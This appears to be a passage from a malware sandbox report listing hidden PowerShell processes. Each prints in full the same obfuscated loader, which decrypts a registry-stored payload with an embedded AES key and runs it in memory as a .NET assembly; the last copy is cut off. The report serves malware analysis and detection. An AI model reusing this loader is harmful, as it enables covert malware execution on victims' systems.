[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        
        PID:6284
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        Hide Artifacts: Hidden Window
        
        PID:6140
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw2, 0, $DEDSw2.Length);$DEDSw2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw2);$DEDSw3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('x+L5SCITRwLaIySJMRKPcA==');$DEDSw3 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw3, 0, $DEDSw3.Length);$DEDSw3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw3);$zJtjN.Dispose();$IUziZ1.Dispose();$ZnTbq = [Microsoft.Win32.Registry]::$CcpOW.$mknYJ($DEDSw).$KASyv($jMYEl);$hYcHq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZnTbq);$IUziZ = New-Object System.Security.Cryptography.AesManaged;$IUziZ.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$VYFAv = $IUziZ.('rotpyrceDetaerC'[-1..-15] -join '')();$hYcHq = $VYFAv.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($hYcHq, 0, $hYcHq.Length);$VYFAv.Dispose();$IUziZ.Dispose();$zInKm = New-Object System.IO.MemoryStream(, $hYcHq);$vncyw = New-Object System.IO.MemoryStream;$aIVco = New-Object System.IO.Compression.GZipStream($zInKm, [IO.Compression.CompressionMode]::$DEDSw1);$aIVco.$IVrwI($vncyw);$aIVco.Dispose();$zInKm.Dispose();$vncyw.Dispose();$hYcHq = $vncyw.ToArray();$zxNyE = $BYhfv | IEX;$OwixV = $zxNyE::$DEDSw2($hYcHq);$vhBKp = $OwixV.EntryPoint;$vhBKp.$DEDSw0($null, (, [string[]] ($XVbaw)))
        15⤵
        Hide Artifacts: Hidden Window
        
        PID:6560
        
        C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(1372).WaitForExit();[System.Threading.Thread]::Sleep(5000); $IUziZ1 = New-Object System.Security.Cryptography.AesManaged;$IUziZ1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$IUziZ1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$IUziZ1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('czejaGDzXhtRk3rRQOwA7CFoM90g5FQgnJ85LaUZQd4=');$IUziZ1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('MrEUmw2CRfIwDN4DnujVag==');$zJtjN = $IUziZ1.('rotpyrceDetaerC'[-1..-15] -join '')();$DEDSw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('dNZQ79CdCcT3RZeJIBMeWA==');$DEDSw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw, 0, $DEDSw.Length);$DEDSw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw);$jMYEl = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ffs1oB2cg9MQou+VEQ8aDXxHbAIu//njEEr4yqOAe8c=');$jMYEl = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($jMYEl, 0, $jMYEl.Length);$jMYEl = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($jMYEl);$XVbaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('GvpxgK9ah8YOSS3JRrNuog==');$XVbaw = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVbaw, 0, $XVbaw.Length);$XVbaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVbaw);$BYhfv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('6lRW0jGzlAA5nbkjHf5Tsi2VcY+e72Di8pyST+P3b+zKhEOatzOvsZwWc+tNvaenFYt371ubGqjG2iZNgW2Ruqyxtm0FlLj/6SFCvhVuHBoXGShbkjll0X0J0Yf8IrHI015qKEspAwvJ3BIkY31lE641I57ZA9mkxn3r2dmP9uXIIejGAbUYS/Egydi59SI4nLAn0KYi1PmCbY3T/4H6s6RDYRGM84TonfBl6Shh4V7e77iWS5OK+T93c6MxOusyAlznel1QyGuYsaEpfjJ3pZxnRDqxM+cJ6BV7z8XM6VlKLAriZV3af8+QPmGxYUFSetnhCdNepWVjla/rc+wznH76gqNjdrTdE4sXG2oefxeMo2RVY9GEE56HPY/MHqKXuj9QJ9R71SzOk/Jp6SI/aU6ftBcuLTHGK8ii/LzWWM4=');$BYhfv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($BYhfv, 0, $BYhfv.Length);$BYhfv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($BYhfv);$Rqbjy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zLOMq/59oqNcdFMRuju6ng==');$Rqbjy = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Rqbjy, 0, $Rqbjy.Length);$Rqbjy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Rqbjy);$KASyv = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('72lxeVY82PoJcJ3hbiQEIw==');$KASyv = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($KASyv, 0, $KASyv.Length);$KASyv = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($KASyv);$mknYJ = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('zVB7M6DhuDz9HVN22epYIw==');$mknYJ = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($mknYJ, 0, $mknYJ.Length);$mknYJ = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($mknYJ);$CcpOW = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('HUIziUB7x4wdL9DXkS0rtA==');$CcpOW = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($CcpOW, 0, $CcpOW.Length);$CcpOW = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($CcpOW);$IVrwI = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('sTbvcUvEJoAxsnBrBeUD8g==');$IVrwI = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($IVrwI, 0, $IVrwI.Length);$IVrwI = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($IVrwI);$DEDSw0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('Jlr5GUhwRFzfhvwaclrGQg==');$DEDSw0 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw0, 0, $DEDSw0.Length);$DEDSw0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw0);$DEDSw1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('VRv4nf1Tsuy8xOh1GOIbLw==');$DEDSw1 = $zJtjN.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($DEDSw1, 0, $DEDSw1.Length);$DEDSw1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($DEDSw1);$DEDSw2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('qoyKUlYeEofaQd2Nsn4c1Q==');$DEDSw2 = 